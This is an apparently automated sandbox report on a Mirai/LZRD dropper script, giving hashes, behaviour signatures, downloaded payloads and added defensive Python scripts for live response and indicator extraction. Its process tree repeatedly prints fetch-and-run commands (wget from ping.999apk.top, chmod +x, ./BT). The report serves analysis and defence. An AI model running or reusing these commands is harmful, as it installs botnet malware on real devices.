Analysis
- max time kernel: 151s
- max time network: 139s
- platform: debian-9_armhf
- resource: debian9-armhf-20221111-en
- resource tags: arch:armhf, image:debian9-armhf-20221111-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 30-04-2023 13:01
Tasks
- Static task: static1
- Behavioral task: behavioral1, sample D.sh, resource ubuntu1804-amd64-en-20211208
- Behavioral task: behavioral2, sample D.sh, resource debian9-armhf-20221111-en
- Behavioral task: behavioral3, sample D.sh, resource debian9-mipsbe-en-20211208
General
- Target: D.sh
- Size: 1KB
- MD5: e41b9523a8373b79498bef2473723adf
- SHA1: bd468f9718ef86d34c88552dd01464f85e8e2ee5
- SHA256: 27304700dc53d71505aa6d32165fe6142f3e6173effcd08a84255a3eae40788e
- SHA512: 0b933fcf0f8a24ffd62431f47469529fce2170307777a632d74af893902af3ba60a14076a74874354c7667b39e5ebf37a2f6f1e9d145599d22c2fbbb03f31476
Malware Config
- Extracted: mirai, LZRD (the same two values were reported four times)
Signatures
- Modifies the Watchdog daemon (1 TTP)
  Malware like Mirai modifies the watchdog to prevent it from restarting an infected system.
- Writes file to system bin folder (1 TTP, 2 IoCs)
  description                   ioc
  File opened for modification  /sbin/watchdog
  File opened for modification  /bin/watchdog
- Executes dropped EXE (13 IoCs)
  pid  process
  377  wget
  383  cat
  389  chmod
  395  BT
  401  wget
  407  cat
  412  chmod
  417  BT
  422  wget
  430  (name not recorded)
  436  (name not recorded)
  442  (name not recorded)
  448  (name not recorded)
- Matches YARA rule upx (UPX-packed executables; 18 matches)
  resource     yara_rule
  /tmp/x86     upx
  /tmp/BT      upx
  /tmp/mips    upx
  /tmp/BT      upx
  /tmp/x86_64  upx
  /tmp/BT      upx
  /tmp/mpsl    upx
  /tmp/BT      upx
  /tmp/arm     upx
  /tmp/BT      upx
  /tmp/arm5    upx
  /tmp/BT      upx
  /tmp/arm6    upx
  /tmp/BT      upx
  /tmp/arm7    upx
  /tmp/BT      upx
  /tmp/ppc     upx
  /tmp/BT      upx
- Reads runtime system information (21 IoCs)
  Reads data from the /proc virtual filesystem. The cmdline reads across many PIDs, together with /proc/self/exe, are the pattern of the process-killer routine found in Mirai variants, which walks /proc to find and kill competing bots.
  description              ioc                process
  File opened for reading  /proc/477/cmdline
  File opened for reading  /proc/self/exe     BT
  File opened for reading  /proc/463/cmdline
  File opened for reading  /proc/465/cmdline
  File opened for reading  /proc/467/cmdline
  File opened for reading  /proc/469/cmdline
  File opened for reading  /proc/471/cmdline
  File opened for reading  /proc/473/cmdline
  File opened for reading  /proc/479/cmdline
  File opened for reading  /proc/self/exe     BT
  File opened for reading  /proc/425/cmdline
  File opened for reading  /proc/451/cmdline
  File opened for reading  /proc/453/cmdline
  File opened for reading  /proc/458/cmdline
  File opened for reading  /proc/480/cmdline
  File opened for reading  /proc/460/cmdline
  File opened for reading  /proc/461/cmdline
  File opened for reading  /proc/475/cmdline
  File opened for reading  /proc/459/cmdline
  File opened for reading  /proc/470/cmdline
  File opened for reading  /proc/481/cmdline
- Writes file to tmp directory (13 IoCs)
  Malware often drops required files in the /tmp directory. No /tmp/arc entry appears here although the script fetches arc, so that download produced no file.
  description                   ioc          process
  File opened for modification  /tmp/mpsl    wget
  File opened for modification  /tmp/arm6    wget
  File opened for modification  /tmp/ppc     wget
  File opened for modification  /tmp/spc     wget
  File opened for modification  /tmp/m68k    wget
  File opened for modification  /tmp/x86     wget
  File opened for modification  /tmp/mips    wget
  File opened for modification  /tmp/arm     wget
  File opened for modification  /tmp/arm5    wget
  File opened for modification  /tmp/arm7    wget
  File opened for modification  /tmp/sh4     wget
  File opened for modification  /tmp/BT
  File opened for modification  /tmp/x86_64  wget
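The watchdog and bin-folder signatures above are the two behaviours a responder checks for first on a suspect device. What follows is an added example, not code from the report or from any bot: a Python live-response script that walks /proc (the real one by default, or a constructed look-alike built by build_fake_proc for offline use) and reports processes that hold a watchdog device open or execute from a scratch directory such as /tmp. The device-node names and the scratch-directory list are assumptions of this example. For the /sbin/watchdog and /bin/watchdog writes themselves, the check on Debian is dpkg -V, which lists packaged files whose recorded hash no longer matches.

```python
"""Live-response check for two Mirai behaviours flagged by the sandbox:
a process holding the watchdog device open, and a process executing out
of a scratch directory. Added example; names are this example's own."""
import os
import tempfile
from dataclasses import dataclass, field

# Device nodes a bot opens to disable the hardware watchdog (assumption:
# the two common names; some platforms use other nodes).
WATCHDOG_NODES = {"/dev/watchdog", "/dev/misc/watchdog"}
# A long-running daemon should not be executing from any of these.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass
class Finding:
    pid: int
    exe: str
    cmdline: str
    reasons: list = field(default_factory=list)


def _read_cmdline(pid_dir):
    try:
        with open(os.path.join(pid_dir, "cmdline"), "rb") as f:
            return f.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return ""


def _readlink(path):
    try:
        return os.readlink(path)
    except OSError:
        return ""  # process exited, or not root (run as root for full coverage)


def scan_proc(proc_root="/proc"):
    """Return a Finding for every process that holds a watchdog node open
    or whose executable lives under a scratch directory."""
    findings = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        pid_dir = os.path.join(proc_root, name)
        reasons = []
        exe = _readlink(os.path.join(pid_dir, "exe"))
        # A bot that unlinks itself after exec still shows its original path,
        # suffixed with " (deleted)"; match on the path either way.
        if exe.replace(" (deleted)", "").startswith(SCRATCH_DIRS):
            reasons.append("executable in scratch dir: " + exe)
        fd_dir = os.path.join(pid_dir, "fd")
        try:
            fds = os.listdir(fd_dir)
        except OSError:
            fds = []
        for fd in fds:
            target = _readlink(os.path.join(fd_dir, fd))
            if target in WATCHDOG_NODES:
                reasons.append("holds %s open on fd %s" % (target, fd))
        if reasons:
            findings.append(Finding(int(name), exe, _read_cmdline(pid_dir), reasons))
    findings.sort(key=lambda f: f.pid)
    return findings


def build_fake_proc(root=None):
    """Construct a minimal /proc look-alike for offline use: pid 417 mirrors
    the report's ./BT process and is given an open /dev/watchdog; pid 1 is
    a benign init. Constructed data, not captured from a real host."""
    root = root or tempfile.mkdtemp()

    def add(pid, cmdline, exe, fds):
        d = os.path.join(root, str(pid))
        os.makedirs(os.path.join(d, "fd"))
        with open(os.path.join(d, "cmdline"), "wb") as f:
            f.write(cmdline)
        os.symlink(exe, os.path.join(d, "exe"))
        for n, target in fds.items():
            os.symlink(target, os.path.join(d, "fd", str(n)))

    add(1, b"/sbin/init\0", "/sbin/init", {0: "/dev/null"})
    add(417, b"./BT\0", "/tmp/BT", {0: "/dev/null", 3: "/dev/watchdog"})
    return root


if __name__ == "__main__":
    for f in scan_proc():
        print(f.pid, f.exe, repr(f.cmdline), "; ".join(f.reasons))
```

Run it as root: /proc/PID/exe and /proc/PID/fd/* of other users' processes are unreadable otherwise and would silently produce no findings.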
Processes
- /tmp/D.sh (cmdline: /tmp/D.sh)
  - wget (wget http://ping.999apk.top/x86) [Writes file to tmp directory]
  - cat (cat x86)
  - chmod (chmod +x BT D.sh systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86)
  - ./BT (./BT)
  - wget (wget http://ping.999apk.top/mips) [Executes dropped EXE; Writes file to tmp directory]
  - cat (cat mips)
  - chmod (chmod +x BT D.sh mips systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86)
  - ./BT (./BT)
  - wget (wget http://ping.999apk.top/arc)
  - cat (cat arc) [Executes dropped EXE]
  - chmod (chmod +x BT D.sh mips systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86)
  - ./BT (./BT)
  - wget (wget http://ping.999apk.top/x86_64) [Writes file to tmp directory]
  - cat (cat x86_64)
  - chmod (chmod +x BT D.sh mips systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64) [Executes dropped EXE]
  - ./BT (./BT)
  - wget (wget http://ping.999apk.top/mpsl) [Writes file to tmp directory]
  - cat (cat mpsl)
  - chmod (chmod +x BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64)
  - ./BT (./BT) [Executes dropped EXE]
  - wget (wget http://ping.999apk.top/arm) [Writes file to tmp directory]
  - cat (cat arm)
  - chmod (chmod +x arm BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64)
  - ./BT (./BT)
  - wget (wget http://ping.999apk.top/arm5) [Executes dropped EXE; Writes file to tmp directory]
  - cat (cat arm5)
  - chmod (chmod +x arm arm5 BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64)
  - ./BT (./BT)
  - wget (wget http://ping.999apk.top/arm6) [Writes file to tmp directory]
  - cat (cat arm6) [Executes dropped EXE]
  - chmod (chmod +x arm arm5 arm6 BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64)
  - ./BT (./BT) [Reads runtime system information]
  - wget (wget http://ping.999apk.top/arm7) [Writes file to tmp directory]
  - cat (cat arm7)
  - chmod (chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64) [Executes dropped EXE]
  - ./BT (./BT) [Reads runtime system information]
  - wget (wget http://ping.999apk.top/ppc) [Writes file to tmp directory]
  - cat (cat ppc)
  - chmod (chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64)
  - ./BT (./BT) [Executes dropped EXE]
  - wget (wget http://ping.999apk.top/spc) [Writes file to tmp directory]
  - cat (cat spc)
  - chmod (chmod +x arm arm5 arm6 arm7 BT D.sh mips mpsl ppc spc systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64)
  - ./BT (./BT)
  - wget (wget http://ping.999apk.top/m68k) [Executes dropped EXE; Writes file to tmp directory]
  - cat (cat m68k)
  - chmod (chmod +x arm arm5 arm6 arm7 BT D.sh m68k mips mpsl ppc spc systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64)
  - ./BT (./BT)
  - wget (wget http://ping.999apk.top/sh4) [Writes file to tmp directory]
  - cat (cat sh4)
  - chmod (chmod +x arm arm5 arm6 arm7 BT D.sh m68k mips mpsl ppc sh4 spc systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae x86 x86_64)
  - ./BT (./BT)

Every iteration is the same four steps: wget the payload for one architecture from ping.999apk.top, cat it, chmod +x, run ./BT. The chmod argument list grows by one name per iteration and always includes D.sh itself and the two systemd-private-* directories in /tmp, which is what a shell produces for a wildcard over /tmp; the script does not name its files. The sandbox records argv only, so the redirection on each cat is not visible, but the Downloads listing shows twelve /tmp/BT snapshots whose hashes are exactly those of the per-architecture files, so each cat copies the freshly fetched payload over BT before it is executed. arc never appears in a later chmod argument list and no /tmp/arc artifact is recorded, so that fetch produced no file. The Reads runtime system information tag is attached to the ./BT runs that follow the arm6 and arm7 fetches, consistent with an ARM build executing natively in this armhf sandbox while the other builds fail to run.
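The tree above is the same wget/cat/chmod/exec sequence repeated per architecture, which is the part of a Mirai dropper a responder wants to turn into indicators. The block below is an added example, not code from the report or from the malware: it groups the children of /tmp/D.sh into per-payload iterations and derives the C2 host, the payload list, the payloads that were absent when chmod ran, and whether chmod was fed a wildcard. PROC_LOG is constructed from the first four iterations of the tree (argv only, as the sandbox records it); the function and marker names are this example's own.

```python
"""Parse a dropper's child-process argv lines into per-payload iterations and
summarise the IoCs. Added example; PROC_LOG is constructed from the process
tree in the report (first four iterations), names are this example's own."""
from urllib.parse import urlparse

S1 = "systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timedated.service-C7MkLQ"
S2 = "systemd-private-b8bd0d11a5574b8bb19ade2b14b4e8c0-systemd-timesyncd.service-YGPoae"

PROC_LOG = [
    "wget http://ping.999apk.top/x86",
    "cat x86",
    "chmod +x BT D.sh %s %s x86" % (S1, S2),
    "./BT",
    "wget http://ping.999apk.top/mips",
    "cat mips",
    "chmod +x BT D.sh mips %s %s x86" % (S1, S2),
    "./BT",
    "wget http://ping.999apk.top/arc",
    "cat arc",
    "chmod +x BT D.sh mips %s %s x86" % (S1, S2),
    "./BT",
    "wget http://ping.999apk.top/x86_64",
    "cat x86_64",
    "chmod +x BT D.sh mips %s %s x86 x86_64" % (S1, S2),
    "./BT",
]

# Names that only reach a chmod argument list if the shell expanded a
# wildcard over /tmp: the dropper script itself and systemd's private dirs.
GLOB_MARKERS = ("D.sh", "systemd-private-")


def split_iterations(log):
    """Group argv lines into wget/cat/chmod/exec iterations, one per payload.
    Lines before the first wget are ignored."""
    iterations, cur = [], None
    for argv in log:
        tok = argv.split()
        if tok[0] == "wget" and len(tok) > 1:
            cur = {"url": tok[1], "payload": tok[1].rsplit("/", 1)[-1],
                   "copied": False, "present_at_chmod": False,
                   "glob_chmod": False, "exec": None}
            iterations.append(cur)
        elif cur is None:
            continue
        elif tok[0] == "cat":
            cur["copied"] = cur["payload"] in tok[1:]
        elif tok[0] == "chmod":
            args = tok[2:]  # skip the mode argument
            cur["present_at_chmod"] = cur["payload"] in args
            cur["glob_chmod"] = any(a.startswith(GLOB_MARKERS) for a in args)
        elif tok[0].startswith("./"):
            cur["exec"] = tok[0]
    return iterations


def summarise(log):
    """IoC summary a responder would block on or hunt for."""
    its = split_iterations(log)
    return {
        "c2_hosts": sorted({urlparse(i["url"]).hostname for i in its}),
        "urls": [i["url"] for i in its],
        "payloads": [i["payload"] for i in its],
        "all_copied": all(i["copied"] for i in its),
        # fetched, but absent when chmod ran: the download produced no file
        "missing_after_fetch": [i["payload"] for i in its if not i["present_at_chmod"]],
        "chmod_via_glob": all(i["glob_chmod"] for i in its),
        "staged_binary": sorted({i["exec"] for i in its if i["exec"]}),
    }


if __name__ == "__main__":
    for key, value in summarise(PROC_LOG).items():
        print(key, value)
```

The same function applied to the full tree yields thirteen payload names and one C2 host; the missing_after_fetch check is what catches arc without reading the download listing.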
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
Twelve /tmp/BT snapshots and twelve per-architecture payloads were captured. Each /tmp/BT snapshot is a byte-identical copy of one payload (BT is overwritten on every iteration), and /tmp/x86 and /tmp/x86_64 are the same file. No /tmp/arc was captured.
- /tmp/BT, 21KB (identical to /tmp/arm)
  MD5 0cb2516e0c4665363644396499cb7aec
  SHA1 995fc2ab54085422d82676b252a2bab06cdf5704
  SHA256 7113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1
  SHA512 d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88
- /tmp/BT, 18KB (identical to /tmp/arm5)
  MD5 0e6fe9b5313bd0deaffb51f2fbbe06cb
  SHA1 6facd101542faf57dab7824909e0c3d29513da60
  SHA256 3ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863
  SHA512 43fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e
- /tmp/BT, 26KB (identical to /tmp/arm6)
  MD5 67110fddb816519a3d5d352b5f32bbbb
  SHA1 6a541fce786c16301901087977b30476920e3382
  SHA256 14acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6
  SHA512 f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35
- /tmp/BT, 45KB (identical to /tmp/arm7)
  MD5 db3001dc744f15e5dfd694e26b57979c
  SHA1 9fde5950b212a39e94e15ed3347cca61d514a95b
  SHA256 076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e
  SHA512 1d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731
- /tmp/BT, 21KB (identical to /tmp/ppc)
  MD5 6260fc510dee1aef342de3bf2892bf7c
  SHA1 4c5d1757ef56a3c4578f7db2949800b0a8b08005
  SHA256 f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4
  SHA512 b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72
- /tmp/BT, 20KB (identical to /tmp/x86 and /tmp/x86_64)
  MD5 9ec34b55333c129649743dcbd42e4256
  SHA1 da9072bba9e8a239356d51a1fcf9418de30a86d0
  SHA256 fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
  SHA512 d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
- /tmp/BT, 57KB (identical to /tmp/spc)
  MD5 bebd6bb6e9ba158796f9ec38b0bb6d61
  SHA1 c28caab155d866d7223b6f09e43f0d9176344c8c
  SHA256 b9feac2aba1c7fef005f5992c7d3dc15d1564ccdc8aa3d833d7fe76d46a13e5a
  SHA512 b21b5604279d00acc7e86950f72bc79f32d3b65bad69ae49977acf606c9b1539b1ae78d001a5a4e1529e6258e19079f8858ea3539bd2d004c74918e909d9ea56
- /tmp/BT, 53KB (identical to /tmp/m68k)
  MD5 6fdd07c178e50ab399b8c76b2843f2f6
  SHA1 2f5df889cb98984a913a1c24efb222492aa93c27
  SHA256 f48d2353dd546d477e7befe5c2b59e861c425477cfa345f27f6a9d4c5ca8e070
  SHA512 52224cb4f205020548e5430f310240d544f2eca1bd2ae0b2f4eac78195963d4836b2740bda292d696ef81ab2c053b85b6b6f38175e364394c3031bdb2df0ad8d
- /tmp/BT, 48KB (identical to /tmp/sh4)
  MD5 df45048f800e71326852acbdd078a3ae
  SHA1 5377821189664f7cc467f640c51b58841f8d9bf3
  SHA256 e0906b20d81f27308654f5ba1a68865c752881b530ebcfeb76d0651038753b8c
  SHA512 352a43d623da15e498ed0489a79db0c1b53f7ad3a8e7c0bddcb63df7d90f16a27893e0152d5283a695c9fa78c06bb2b54e9bc1abb88c6b00a16a7eeb97768d4d
- /tmp/BT, 23KB (identical to /tmp/mips)
  MD5 5ffea0b004a955d227e947d486ab573f
  SHA1 de6fe607474109e92373ed4b6f54cb678e69f04f
  SHA256 472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02
  SHA512 93f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f
- /tmp/BT, 20KB (identical to /tmp/x86 and /tmp/x86_64)
  MD5 9ec34b55333c129649743dcbd42e4256
  SHA1 da9072bba9e8a239356d51a1fcf9418de30a86d0
  SHA256 fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
  SHA512 d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
- /tmp/BT, 24KB (identical to /tmp/mpsl)
  MD5 d1d7efff7b9a9627879ceb1a79832a28
  SHA1 5f88e33dec795ff429d2a44c7743d3bc948dcc19
  SHA256 c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d
  SHA512 301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c
- /tmp/arm, 21KB
  MD5 0cb2516e0c4665363644396499cb7aec
  SHA1 995fc2ab54085422d82676b252a2bab06cdf5704
  SHA256 7113f3bdb51dda7364409aa36dc551117c2ac0468f97ab48354a8cc71f8ba6d1
  SHA512 d6a4282960ce9735914b4e7fbff860865d10f66a5559cd50f3e02fc2037a895fbd053c64ed8926e43cf35502bc016e7a0c928925d03286c046f534da4dc10d88
- /tmp/arm5, 18KB
  MD5 0e6fe9b5313bd0deaffb51f2fbbe06cb
  SHA1 6facd101542faf57dab7824909e0c3d29513da60
  SHA256 3ee59d8e2e63a5a183dd8eb8ba938dbbcc58a04db4f29765c119403a0aae3863
  SHA512 43fccf08a10d34d7563deaff7b52f3562b5dd834e22f03c28861476be3470ed5921e56dfab0c2822ad34bb8bffbe4f81ed2af35bb87f767c533444dd83a9756e
- /tmp/arm6, 26KB
  MD5 67110fddb816519a3d5d352b5f32bbbb
  SHA1 6a541fce786c16301901087977b30476920e3382
  SHA256 14acc984b234291e48d24fdbc014b3a618aefb2b4ff446260b0be99c1623a9e6
  SHA512 f333ca1d2c43e5172f914574c75b08c07e908bc9e97bca766fdf4f170af98cdffa00d7b38fe99bbef16b0f2a71ead664076eb726e9226c76b8b8c9454ee11c35
- /tmp/arm7, 45KB
  MD5 db3001dc744f15e5dfd694e26b57979c
  SHA1 9fde5950b212a39e94e15ed3347cca61d514a95b
  SHA256 076c9ddc2515d214a8160053f9d5a17899ecb21cf14d4185d10bb1c475b99d6e
  SHA512 1d925012a6d5d6be1deef6647b62d0e78526a49e17fdf13ff96c7757c4f85ce28c44e1e0acd81034ca75875a5b8a65a0e852cfabb192c064e7d02642bfba8731
- /tmp/m68k, 53KB
  MD5 6fdd07c178e50ab399b8c76b2843f2f6
  SHA1 2f5df889cb98984a913a1c24efb222492aa93c27
  SHA256 f48d2353dd546d477e7befe5c2b59e861c425477cfa345f27f6a9d4c5ca8e070
  SHA512 52224cb4f205020548e5430f310240d544f2eca1bd2ae0b2f4eac78195963d4836b2740bda292d696ef81ab2c053b85b6b6f38175e364394c3031bdb2df0ad8d
- /tmp/mips, 23KB
  MD5 5ffea0b004a955d227e947d486ab573f
  SHA1 de6fe607474109e92373ed4b6f54cb678e69f04f
  SHA256 472f3f6b0f4f2dbbe1af76ad64d0fed8df5e6e4921154dee7f594c031de1bb02
  SHA512 93f545c480e20f3f52bc55d9748a77ee5e9a966a6ab1fa8192f72c1c7eff2e1ab6c2f31b74b40b6fd4ba144fb3fe41ad3dc450323d1ad5e2b6a8a64ee5ec641f
- /tmp/mpsl, 24KB
  MD5 d1d7efff7b9a9627879ceb1a79832a28
  SHA1 5f88e33dec795ff429d2a44c7743d3bc948dcc19
  SHA256 c36f13c7746fad54448f35fbe2f8bdaeba34af7b29f1d0f406edf2cbc3bbf21d
  SHA512 301da978c8e006a61b6c37ac7a8ce00527fb292a82a97c2fac4483d5bab1fc2d3cbcb6a4a29f273465de2077e68d0e4263012c47b2a88cf290ee5e6fc962e53c
- /tmp/ppc, 21KB
  MD5 6260fc510dee1aef342de3bf2892bf7c
  SHA1 4c5d1757ef56a3c4578f7db2949800b0a8b08005
  SHA256 f9e0997c9e8db0a897c90de5ae067fcff27ff10a39f65b5e3928eb0db2c909e4
  SHA512 b5bbcabe0e87ceb49cf1340b2c930f5ddc1f70904110717178130f14527520d7ca0f35db8176f75c0b6b32d0a1092830ec77dc618e3d5c17810362fc96c61c72
- /tmp/sh4, 48KB
  MD5 df45048f800e71326852acbdd078a3ae
  SHA1 5377821189664f7cc467f640c51b58841f8d9bf3
  SHA256 e0906b20d81f27308654f5ba1a68865c752881b530ebcfeb76d0651038753b8c
  SHA512 352a43d623da15e498ed0489a79db0c1b53f7ad3a8e7c0bddcb63df7d90f16a27893e0152d5283a695c9fa78c06bb2b54e9bc1abb88c6b00a16a7eeb97768d4d
- /tmp/spc, 57KB
  MD5 bebd6bb6e9ba158796f9ec38b0bb6d61
  SHA1 c28caab155d866d7223b6f09e43f0d9176344c8c
  SHA256 b9feac2aba1c7fef005f5992c7d3dc15d1564ccdc8aa3d833d7fe76d46a13e5a
  SHA512 b21b5604279d00acc7e86950f72bc79f32d3b65bad69ae49977acf606c9b1539b1ae78d001a5a4e1529e6258e19079f8858ea3539bd2d004c74918e909d9ea56
- /tmp/x86, 20KB
  MD5 9ec34b55333c129649743dcbd42e4256
  SHA1 da9072bba9e8a239356d51a1fcf9418de30a86d0
  SHA256 fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
  SHA512 d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
- /tmp/x86_64, 20KB (identical to /tmp/x86)
  MD5 9ec34b55333c129649743dcbd42e4256
  SHA1 da9072bba9e8a239356d51a1fcf9418de30a86d0
  SHA256 fa2541dac4f87ab50f1c9f49bf48b9795d56f0da1a06a0df54de40d4a23a9ec7
  SHA512 d9a55a38809b3a0daec699aa20fe68cf487b19b6c0a3c7d6e948bef59e58b270bb08f654b28f2db312061bd9e02cf9c528b32c848a181f75482c30e176e32d42
- memory/417-1-0x00008000-0x000228c4-memory.dmp
- memory/422-2-0x00008000-0x00026464-memory.dmp
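Twenty-four download records reduce to eleven distinct binaries once the /tmp/BT snapshots are matched against the per-architecture payloads by hash. The block below is an added example, not code from the report: it labels each /tmp/BT snapshot with the payload it copies, lists payload names that share one hash (distinct architecture slots served the same binary), and deduplicates the set to submit for further analysis. The MD5 lists are copied from the listing above (the SHA1, SHA256 and SHA512 values pair up the same way); the function names are this example's own.

```python
"""Correlate staged-binary snapshots with per-architecture payloads by hash.
Added example; the hash data is copied from the sandbox report's Downloads
listing, the function names are this example's own."""
from collections import defaultdict

# (size, MD5) of each /tmp/BT record, in listing order
BT_SNAPSHOTS = [
    ("21KB", "0cb2516e0c4665363644396499cb7aec"),
    ("18KB", "0e6fe9b5313bd0deaffb51f2fbbe06cb"),
    ("26KB", "67110fddb816519a3d5d352b5f32bbbb"),
    ("45KB", "db3001dc744f15e5dfd694e26b57979c"),
    ("21KB", "6260fc510dee1aef342de3bf2892bf7c"),
    ("20KB", "9ec34b55333c129649743dcbd42e4256"),
    ("57KB", "bebd6bb6e9ba158796f9ec38b0bb6d61"),
    ("53KB", "6fdd07c178e50ab399b8c76b2843f2f6"),
    ("48KB", "df45048f800e71326852acbdd078a3ae"),
    ("23KB", "5ffea0b004a955d227e947d486ab573f"),
    ("20KB", "9ec34b55333c129649743dcbd42e4256"),
    ("24KB", "d1d7efff7b9a9627879ceb1a79832a28"),
]

# MD5 of each per-architecture payload written to /tmp
ARCH_PAYLOADS = {
    "arm":    "0cb2516e0c4665363644396499cb7aec",
    "arm5":   "0e6fe9b5313bd0deaffb51f2fbbe06cb",
    "arm6":   "67110fddb816519a3d5d352b5f32bbbb",
    "arm7":   "db3001dc744f15e5dfd694e26b57979c",
    "m68k":   "6fdd07c178e50ab399b8c76b2843f2f6",
    "mips":   "5ffea0b004a955d227e947d486ab573f",
    "mpsl":   "d1d7efff7b9a9627879ceb1a79832a28",
    "ppc":    "6260fc510dee1aef342de3bf2892bf7c",
    "sh4":    "df45048f800e71326852acbdd078a3ae",
    "spc":    "bebd6bb6e9ba158796f9ec38b0bb6d61",
    "x86":    "9ec34b55333c129649743dcbd42e4256",
    "x86_64": "9ec34b55333c129649743dcbd42e4256",
}


def index_by_hash(payloads):
    """hash -> sorted list of payload names carrying that hash."""
    by_hash = defaultdict(list)
    for name, h in payloads.items():
        by_hash[h].append(name)
    return {h: sorted(names) for h, names in by_hash.items()}


def map_snapshots(snapshots, payloads):
    """Label each staged-binary snapshot with the payload(s) it is a
    byte-for-byte copy of. Returns (labels, unmatched_hashes); an unmatched
    hash would mean BT held something the dropper did not fetch."""
    by_hash = index_by_hash(payloads)
    labels, unmatched = [], []
    for _size, h in snapshots:
        names = by_hash.get(h)
        if names:
            labels.append("+".join(names))
        else:
            unmatched.append(h)
    return labels, unmatched


def duplicate_payloads(payloads):
    """Groups of payload names that share one hash."""
    return [names for names in index_by_hash(payloads).values() if len(names) > 1]


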